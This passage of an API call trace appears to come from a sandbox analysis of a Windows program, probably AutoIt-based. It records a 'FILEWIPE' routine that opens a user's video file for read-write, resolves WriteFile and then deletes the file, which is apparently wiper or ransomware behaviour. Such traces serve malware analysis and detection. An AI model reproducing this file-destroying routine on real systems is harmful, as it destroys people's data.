dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0192.842] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0192.842] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0192.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0192.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0192.842] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0192.842] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.842] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0192.842] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0192.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0192.842] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0192.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0192.843] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0192.843] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0192.843] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.843] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0192.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0192.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.843] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.843] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0192.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.843] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.843] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0192.843] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.843] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.843] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0192.843] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.844] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.844] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0192.844] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0192.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0192.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.844] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0192.871] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.871] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0192.872] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.872] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.872] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0192.872] FreeLibrary (hLibModule=0x74f20000) returned 1 [0192.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0192.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0192.872] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0192.872] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0192.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0192.872] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.872] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.873] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.874] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.874] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0192.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0192.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.875] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.875] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.875] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde8559c0, ftCreationTime.dwHighDateTime=0x1d5e560, ftLastAccessTime.dwLowDateTime=0x460bbc0, ftLastAccessTime.dwHighDateTime=0x1d5e69d, ftLastWriteTime.dwLowDateTime=0x460bbc0, ftLastWriteTime.dwHighDateTime=0x1d5e69d, nFileSizeHigh=0x0, nFileSizeLow=0x71e4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="S8EN.mkv", cAlternateFileName="")) returned 0x90ae18 [0192.875] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0192.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0192.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0192.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0192.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0192.875] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.875] CharLowerBuffW (in: lpsz="byte[29156]", cchLength=0xb | out: lpsz="byte[29156]") returned 0xb [0192.875] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.876] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0192.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0192.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0192.876] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.876] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0192.876] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0192.876] FreeLibrary (hLibModule=0x75c90000) returned 1 [0192.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0192.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0192.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0192.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0192.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0192.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0192.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0192.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0192.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0192.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0192.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0192.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0192.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0192.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0192.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0192.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0192.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0192.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0192.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0192.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0192.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0192.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0192.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0192.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0192.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0192.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0192.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.877] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.877] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.877] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.877] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0192.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.878] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0192.878] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.879] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ccosswxcev8zf\\s8en.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0192.879] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.879] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.879] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.879] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.879] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0192.879] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.879] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.879] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.880] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.880] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.880] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.880] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.880] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.880] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0192.880] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.880] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.880] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.880] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.880] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.881] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.881] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.881] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv", lpFilePart=0x0) returned 0x3b [0192.881] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde8559c0, ftCreationTime.dwHighDateTime=0x1d5e560, ftLastAccessTime.dwLowDateTime=0x460bbc0, ftLastAccessTime.dwHighDateTime=0x1d5e69d, ftLastWriteTime.dwLowDateTime=0x18299860, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x71e4, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="S8EN.mkv", cAlternateFileName="")) returned 0x90ae18 [0192.881] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ccosswxcev8zf\\s8en.mkv")) returned 1 [0192.884] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde8559c0, ftCreationTime.dwHighDateTime=0x1d5e560, ftLastAccessTime.dwLowDateTime=0x460bbc0, ftLastAccessTime.dwHighDateTime=0x1d5e69d, ftLastWriteTime.dwLowDateTime=0x18299860, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x71e4, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="S8EN.mkv", cAlternateFileName="")) returned 0 [0192.884] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0192.887] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.887] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0192.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0192.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0192.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0192.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0192.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0192.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0192.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0192.888] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0192.888] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0192.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0192.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0192.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 